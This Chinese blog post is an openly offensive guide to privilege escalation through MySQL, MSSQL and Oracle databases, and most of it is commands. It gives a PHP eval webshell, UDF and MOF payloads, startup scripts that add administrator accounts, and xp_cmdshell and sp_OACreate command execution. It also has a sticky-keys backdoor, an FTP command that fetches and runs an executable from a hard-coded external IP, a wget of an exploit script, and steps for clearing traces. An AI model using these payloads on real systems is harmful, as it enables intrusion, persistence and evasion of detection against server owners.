主頁 >  其他 > 資料庫提權總結

資料庫提權總結

2021-09-14 08:51:51 其他

前言

資料庫權限

在平常的滲透提權中,我們通常可以在一些特殊情況下得到資料庫的用戶名和密碼(最高權限root),如下:

MySQL 3306 埠弱口令爆破
sqlmap 注入的 --sql-shell 模式
網站的資料庫組態檔中拿到明文密碼資訊
CVE-2012-2122 等這類漏洞直接拿下 MySQL 權限

口令爆破、sqlmap的--sql-shell模式和資料庫組態檔中拿明文密碼已經老生常談了,這里主要演示一下CVE-2012-2122

CVE-2012-2122

當連接MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由于不正確的處理,會導致即便是memcmp()回傳一個非零值,也會使MySQL認為兩個密碼是相同的, 也就是說只要知道用戶名,不斷嘗試就能夠直接登入SQL資料庫,按照公告說法大約256次就能夠蒙對一次,

#受影響版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

在vunlub中啟動CVE-2012-2122環境

 

 環境啟動后用docker ps查看行程

 

 可以看到啟動了一個Mysql服務(版本:5.5.23),監聽埠為3306埠,默認的root用戶的密碼為123456

我們可以使用mysql客戶端進行遠程連接資料庫

 連接測驗就證明我們的環境正常搭建,然后就是漏洞利用了,正常模擬攻擊者,我們是沒有密碼,不知道root的密碼為123456的,這個時候我們就可以利用CVE-2012-2122來進行身份繞過

msf可以匯出hash值

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 > set rhosts 192.168.178.128
msf6 > run

或者直接bash輸入

root@root:~/桌面# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.178.128 2>/dev/null; done
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 854
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> 

MySQL提權

Webshell權限

into oufile 寫 shell

into oufile 寫 shell要滿足如下條件才可以寫入

1、知道網站物理路徑
2、高權限資料庫用戶
3、load_file() 開啟 即 secure_file_priv 無限制
4、網站路徑有寫入權限

 資料庫查看是否有secure_file_priv限制

mysql> show global variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+
Value說明
NULL 不允許匯入或匯出
/ 只允許在 / 目錄匯入匯出
不限制目錄

在 MySQL 5.5 之前 secure_file_priv 默認是空,這個情況下可以向任意絕對路徑寫檔案

在 MySQL 5.5之后 secure_file_priv 默認是 NULL,這個情況下不可以寫檔案

利用phpmyadmin來into outfile

首先在存在phpmyadmin時,我們可以試試弱口令,root、root來進行登錄phpmyadmin后臺,登錄進去后我們獲取網站的絕對路徑來進行寫shell

在phpmyadmin中,我們可以利用log變數來猜測網站的絕對路徑

 

 

 這里是用phpstudy搭建的網站,所以猜測網站目錄在WWW目錄下,或者通過其他手段的資訊收集,來收集到我們的網站絕對路徑,

有了網站路徑,我們就可以執行SQL命令來進行寫shell

  寫入失敗,這里失敗的原因是因為我們前面查詢secure_file_priv值為null,所以權限就是不允許匯入或匯出,這里我們對secure_file_priv進行修改為空后,再進行寫入,

因為secure_file_priv為只讀權限,所以我們打開my.ini檔案,加入如下陳述句再重啟服務器,

secure_file_priv=''

這時查看權限為所有目錄下可寫入

 

 

 再次寫入shell,會發現成功寫入,

 

 

 然后菜刀、蟻劍進行連接,

 

 

 當然我么還可以利用sqlmap進行檔案的寫入,如下:

sqlmap -u "http://x.x.x.x/?id=x" --file-write="c:/Users/suifeng/Desktop/shell.php" --file-dest="C:/phpstudy_pro/WWW/shell.php"

 當然這種寫shell的方式,在MySQL 5.5之后已經很難實作了,因為MySQL 5.5之后值為NULL,在secure_file_priv沒有匯入匯出權限的時候,我們還可以利用日志寫shell,

利用日志寫shell

在MySQL 5.0 版本以上會創建日志檔案,我們可以通過修改日志的全域變數中的存盤位置來 getshell

mysql> SHOW VARIABLES LIKE '%general%';
+------------------+-----------------------------------------------------------------+
| Variable_name    | Value                                                           |
+------------------+-----------------------------------------------------------------+
| general_log      | OFF                                                             |
| general_log_file | C:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-1G2NI5V.log |
+------------------+-----------------------------------------------------------------+

general_log 默認關閉,高權限的用戶可以直接通過mysql命令列進行開啟,開啟后日志檔案記錄用戶的每條指令,將其保存在general_log _file中,我們可以通過開啟general_log ,然后自定義general_log _file來進行getshell,

mysql> set global general_log = "ON";   #開啟general_log
mysql> set global general_log_file='c:/phpstudy_pro/www/shell.php'; #修改general_log_file路徑

再次查看權限

 

#寫入shell
mysql> select "<?php @eval($_POST['suifeng']);?>";
+-----------------------------------+
| <?php @eval($_POST['suifeng']);?> |
+-----------------------------------+
| <?php @eval($_POST['suifeng']);?> |
+-----------------------------------+

然后蟻劍連接

 

服務器權限

UDF提權

什么是UDF

UDF(user-defined function)是MySQL的一個拓展介面,也可稱之為用戶自定義函式,它是用來拓展MySQL的技術手段,可以說是資料庫功能的一種擴展,用戶通過自定義函式來實作在MySQL中無法方便實作的功能,其添加的新函式都可以在SQL陳述句中呼叫,就像呼叫一些系統函式如version()函式便捷,

元件

提權大致方法是把我們的元件放置在特點的目錄下,創建我們自定義函式,實作系統函式命令的呼叫,最終導致提權,

在mysql<5.1  匯出目錄c:/windows或system32

在mysql>=5.1  匯出安裝目錄/lib/plugin/

在有注入點時候,我們可以通過sqlmap中里的UDF元件進行匯入

#sqlmap中元件位置
D:\tools\sqlmap\data\udf\mysql

里面有windows和linux且64位和32位版本,大家可以根據被攻擊器來進行選擇

 

sqlmap中的元件為了防止被殺毒軟體查殺,都經過了編碼處理,不能直接使用,所以我們還需要用sqlmap自帶的解碼工具clock.py進行解碼

#cloak位置
D:\tools\sqlmap\extra\cloak
#解碼操作
D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll #windows解碼
D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so  #linux解碼
 

元件上傳位置

在上傳元件之前,我們要先對mysql的版本進行判斷

#判斷資料庫版本
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.7.26    |
+-----------+

這里被攻擊的靶機版本為5.7.26,所以我們要把元件上傳到安裝目錄/lib/plugin/下面,那我們可以利用如下命令查找安裝目錄

mysql> show variables like '%plugin%';
+-------------------------------+----------------------------------------------------+
| Variable_name                 | Value                                              |
+-------------------------------+----------------------------------------------------+
| default_authentication_plugin | mysql_native_password                              |
| plugin_dir                    | C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ |
+-------------------------------+----------------------------------------------------+

mysql> select @@basedir;
+-----------------------------------------+
| @@basedir |
+-----------------------------------------+
| C:\phpstudy_pro\Extensions\MySQL5.7.26\ |
+-----------------------------------------+

 

來到對應的目錄下并沒有發現/lib/plugin,所以我們需要自己創建一個/lib/plugin,但是真實環境下我們服務器權限還沒有拿下(這里用是為了觀察直觀),所以我們可以在webshell環境下或者通過NTFS ADS流創建檔案夾,

#NTFS ADS流創建陳述句
mysql> select 'x' into dumpfile 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION';  #創建不一定成功,不成功的情況下還是利用webshell的權限創建目錄

 

創建好后我們就可以匯入我們的元件了,

導入元件

存在sql注入時

在存在sql注入的時候,我們可以通過sqlmap來上傳元件,但是需要滿足的條件為secure_file_priv的值為空,sql注入為最高權限,又因為 GET 有位元組長度限制,所以往往 POST 注入才可以執行這種攻擊,

python sqlmap.py -u "http://192.168.178.130/sqli-labs/Less-1/?id=1" --file-write="d:/tools/sqlmap/extra/cloak/lib_mysqludf_sys_64.dll" --file-dest="C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll"

 不存在sql注入時

沒有sql注入時,我們可以通過執行sql陳述句來進行寫入元件,這里需要寫入檔案,所以需要secure_file_priv為空,

#select后面為元件的十六進制編碼(資料太長,這里省略顯示)
SELECT 0x4d5a900003... INTO DUMPFILE 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll';

元件的十六進制可以通過mysql自帶的hex函式或者一些檔案十六進制編碼器工具解決,當然在sql陳述句寫不進去的元件的時候,我們還可以通過我們的webshell來進行上傳,

檔案上傳完成后

 

 我們就可以通過sql陳述句來自定義函式了

#原本執行代碼
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';
#修改后執行代碼
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

本來應該執行這條命令來自定義命令的,但是一直報錯,后來我把dll檔案名字修改之后,創建成功,(可能是下劃線導致函式在編譯情況下出問題)

#查詢自定義函式
mysql> select * from mysql.func; +----------+-----+---------+----------+ | name | ret | dl | type | +----------+-----+---------+----------+ | sys_eval | 0 | udf.dll | function | +----------+-----+---------+----------+
#創建成功后,我們利用自定義函式進行命令執行
mysql > select sys_eval('whoami');

然后用我們這個自定義命令執行函式進行提權即可,最后為了權限維持,防止被發現,我們可以對自定義函式進行洗掉,

#洗掉自定義函式
mysql> drop function sys_eval;

這種手工UDF提權無疑太過繁瑣,這里主要推薦通過網頁版一鍵提權腳本,這里使用的是月師傅的馬,下面是下載地址

鏈接:https://pan.baidu.com/s/1a5ASE2TLvnKsOUxsHKBjOw 
提取碼:v9s9

上傳后訪問

然后再匯入,執行命令即可

 

 

 

MOF提權

現在通過mof檔案來進行提權已經非常困難了,因為它支持提權版本只有2003和一些之前的版本,mof的提權原理為mof檔案每五秒就會執行,而且是系統權限,我們通過mysql使用load_file 將檔案寫入/wbme/mof,然后系統每隔五秒就會執行一次我們上傳的MOF,MOF當中有一段是vbs腳本,我們可以通過控制這段vbs腳本的內容讓系統執行命令,進行提權,

mof腳本如下

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user suifeng p@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators suifeng /add\")";   #創建用戶
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

首先我們將我們的腳本上傳,然后用如下命令上傳到指定目錄,

select load_file("C:/Documents and Settings/suifeng.mof") into dumpfile "c:/windows/system32/wbem/mof/suifeng.mof";

然后等待五秒后用net user命令可以看到創建的用戶

mof提權痕跡清理

因為每隔幾秒鐘時間又會重新執行添加用戶的命令,所以想要清理痕跡得先暫時關閉 winmgmt 服務再洗掉相關 mof 檔案

#停止winmgmt服務
net stop winmgmt
#洗掉Repository檔案夾
rmdir /s /q C:\Windows\system32\wbem\Repository\
#重新啟動服務
net start winmgmt

啟動項提權

MySQL的啟動項提權,原理就是通過mysql把一段vbs腳本匯入到系統的啟動項下,如果管理員啟動或者重啟的服務器,那么該腳本就會被呼叫,并執行vbs腳本里面的命令,

以下是啟動項路徑

#2003
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
#2008
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

有了路徑我們在mysql的shell下輸入如下代碼

create table a (cmd text); 
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 
insert into a values ("a=wshshell.run (""cmd.exe /c net user suifeng p@ssw0rd /add"",0) " ); 
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators suifeng /add"",0) " ); 
select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」選單\\程式\\啟動\\a.vbs";

 

 然后我們在對應路徑下就可以看到我們的vbs腳本了

 

然后重啟,即可發現vbs腳本里面創建的用戶,

CVE-2016-6663、CVE-2016-6664組合提權

在一些Mysql小于5.5.51或小于5.6.32或小于5.7.14及衍生版本,我們都可以利用CVE-2016-6663、CVE-2016-6664組合對其進行測驗提權,

1、利用CVE-2016-6663將www-data權限提升為mysql權限:

cd /var/www/html/
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
./mysql-privesc-race test 123456 localhost testdb

2、利用CVE-2016-6664將Mysql權限提升為root權限:

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log

MSSQL提權

mssql提權前期要做的作業和mysql提權一樣,這里就不再過多的敘述了,主要介紹一下提權方法,

mssql提權必知基本命令

select @@version   #查看資料庫版本
select db_name()   #查看當前資料庫
select IS_SRVROLEMEMBER('sysadmin')  #判斷是否為sa權限
select IS_MEMBER('db_owner')  #判斷是否為dba權限
exec master..xp_msver    #查看資料庫系統引數
#開啟xp_cmdshell exec sp_configure
'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure;
#關閉xp_cmdshell exec sp_configure
'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell', 0;reconfigure;
#禁用advanced options EXEC sp_configure
'show advanced options',0;GO RECONFIGURE;
#sp_OACreate執行命令 DECLARE @js
int EXEC sp_OACreate 'ScriptControl',@js OUT EXEC sp_OASetProperty @js,'Language','JavaScript' ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'
#sp_OACreate移動檔案 declare @aa int exec sp_oacreate 'scripting.filesystemobject' @aa out exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log';
#sp_OACreate復制檔案 declare @o
int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
#sp_OACreate洗掉檔案 DECLARE @Result
int DECLARE @FSO_Token int EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:\Documents and Settings\All Users\ [開始] 選單\程式\啟動\user.bat' EXEC @Result = sp_OADestrop @FSO_Token

mssql提權必知權限管理

1.bulkadmin:這個角色可以運行BULK INSERT陳述句.該陳述句允許從文本檔案中將資料匯入到SQL Server2008資料庫中,為需要執行大容量插入到資料庫的域帳號而設計.
2.dbcreator:這個角色可以創建,更改,洗掉和還原任何資料庫.不僅適合助理DBA角色,也可能適合開發人員角色.
3.diskadmin:這個角色用于管理磁盤檔案,比如鏡像資料庫和添加備份設備.適合助理DBA
4.processadmin:SQL Server 2008可以同時多行程處理.這個角色可以結束行程(在SQL Server 2008中稱為"洗掉")
5.public:有兩大特點:第一,初始狀態時沒有權限;第二,所有資料庫用戶都是它的成員
6.securityadmin:這個角色將管理登錄名及其屬性.可以授權,拒絕和撤銷服務器級/資料庫級權限.可以重置登錄名和密碼
7.serveradmin:這個角色可以更改服務器范圍的配置選項和關閉服務器
8.setupadmin:為需要管理聯接服務器和控制啟動的存盤程序的用戶而設計.
9.sysadmin:這個角色有權在SQL Server 2008 中執行任何操作.

xp_cmdshell提權

xp_cmdshell的作用類似于mysql的udf,其本質是一些sql陳述句的集合,xp_cmdshell也可以理解為一些危險性比較高的小腳本,

xp_cmdshell在mssql2000中開啟,在2005之后就是默認禁止的,我們需要sa權限來開啟xp_cmdshell
#開啟xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

#關閉開啟xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

在打開了xp_cmdshell之后,我們就可以進行執行命令了

EXEC master.dbo.xp_cmdshell 'whoami'

 

 

 

sp_OACreate提權

當xp_cmdshell不可用的時候,我們還可以利用sc_oacreate來進行提權

#開啟sc_oacreate
EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE WITH OVERRIDE;  
EXEC sp_configure 'Ole Automation Procedures', 1;  
RECONFIGURE WITH OVERRIDE;  
EXEC sp_configure 'show advanced options', 0;
1)直接加用戶
 
2000系統:
 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 123/add'
 
  
 
xp和2003系統:
 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123$ 123/add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123$ /add'
 
  
 
2)粘貼鍵替換
 
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
 
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
 
需要同時具備sp_oacreate 和sp_oamethod 兩個功能組件
 
3)直接傳馬
 
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--
 
4)啟動項寫入加賬戶腳本
 
declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';
 
5)如果該服務器有網站,則直接用方法4)寫入一句話

沙盒提權

什么是沙盒模式?

沙盒模式是資料庫的一種安全功能.在沙盒模式下,只對控制元件和欄位屬性中的安全且不含惡意代碼的運算式求值.如果運算式不使用可能以某種方式損壞資料的函式或屬性,則可認為它是安全的.

利用條件:

1,Access可以呼叫VBS的函式,以System權限執行任意命令

2,Access執行這個命令是有條件的,需要一個開關被打開

3,這個開關在注冊表里

4,SA是有權限寫注冊表的

5,用SA寫注冊表的權限打開那個開關

6,呼叫Access里的執行命令方法,以system權限執行任意命令執行SQL命令,執行了以下命令

開啟默認關閉的xp_regwrite存盤程序:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

利用jet.oledb執行系統命令添加系統賬號:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

Oracle提權

Oracle權限分配

系統權限

系統規定用戶使用資料庫的權限,(系統權限是對用戶而言),

系統權限分類
DBA: 擁有全部特權,是系統最高權限,只有DBA才可以創建資料庫結構,
RESOURCE:擁有Resource權限的用戶只可以創建物體,不可以創建資料庫結構,
CONNECT:擁有Connect權限的用戶只可以登錄Oracle,不可以創建物體,不可以創建資料庫結構,
對于普通用戶:授予connect, resource權限,
對于DBA管理用戶:授予connect,resource, dba權限,

物體權限

某種權限用戶對其它用戶的表或視圖的存取權限,(是針對表或視圖而言的),

物體權限分類
select, update, insert, alter, index, delete, all //all包括所有權限
execute //執行存盤程序權限

Oracle提權方法

通過注入存盤程序提權(低權限提升至DBA)

原理

SYS創建的存盤程序存在sql注入,擁有create procedure權限的用戶通過創建提權函式,將提權函式注入到存盤程序中,于是該存盤程序將呼叫這個提權函式來執行grant dba to quan命令,獲得Oracle資料庫dba權限

利用條件

1、SYS創建的存盤程序存在sql注入(EG:CVE-2005-48322、用戶擁有create procedure權限(用來創建函式)

提權步驟

假設有一個用戶quan 只有 CONNECT 和 RESOURCE 權限

手工注入

1)用戶登陸后執行select * from session_privs查看權限

(2)創建函式,命令為grant dba to quan

grant execute on pwn to public;//賦予所有用戶此函式的執行權限

SQL>create or replace function pwn return vaarchar2
authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to quan';
return '';
end;
/

SQL>grant execute on pwn to public;
/3)注入sys.dbms_cdc_subscribe.activate_subscription

SQL>begin
sys.dbms_cdc_subscribe.activate_subscription('''||quan.pwn()||''');
end;
/

SQL>set role dba;
(4)執行select * from session_privs查看是否為dba權限

利用MSF注入

1)加載攻擊模塊

use auxiliary/sqli/oracle/dbms_cdc_subscribe.activate_subscription
(2)配置引數

set dbuser quan

set dbpass quan123

set sid orcl

set rhost xxxxx

set sql grant dba to quan
(3)run

 

2、通過utl_http.request存盤程序提權

原理

Oracle9i~11gR2中dbms_xmlquery.newcontext()dbms_xmlquery.getxml()函式可以執行任意PL/SQL陳述句,利用這兩個函式可以獲得Oracle服務器的作業系統權限

2.2 利用條件

1、UTL_HTTP存盤程序可用

2、Oracle9i~11gR2

提權步驟

(1)創建Java包

(2)創建存盤程序MYJAVACMD

(3)執行存盤程序,成功添加用戶

 

__EOF__

作者: 隨風kali
本文鏈接: https://www.cnblogs.com/sfsec/p/15222027.html
著作權宣告: 本博客所有文章除特別宣告外,均采用 BY-NC-SA 許可協議,轉載請注明出處!
聲援博主: 如果您覺得文章對您有幫助,可以點擊文章右下角推薦一下,您的鼓勵是博主的最大動力!

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/299873.html

標籤:其他

上一篇:云原生愛好者周刊:Lens 5.2 發布,支持 M1 芯片

下一篇:日月既往,不可復追,暑期實習結束!

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

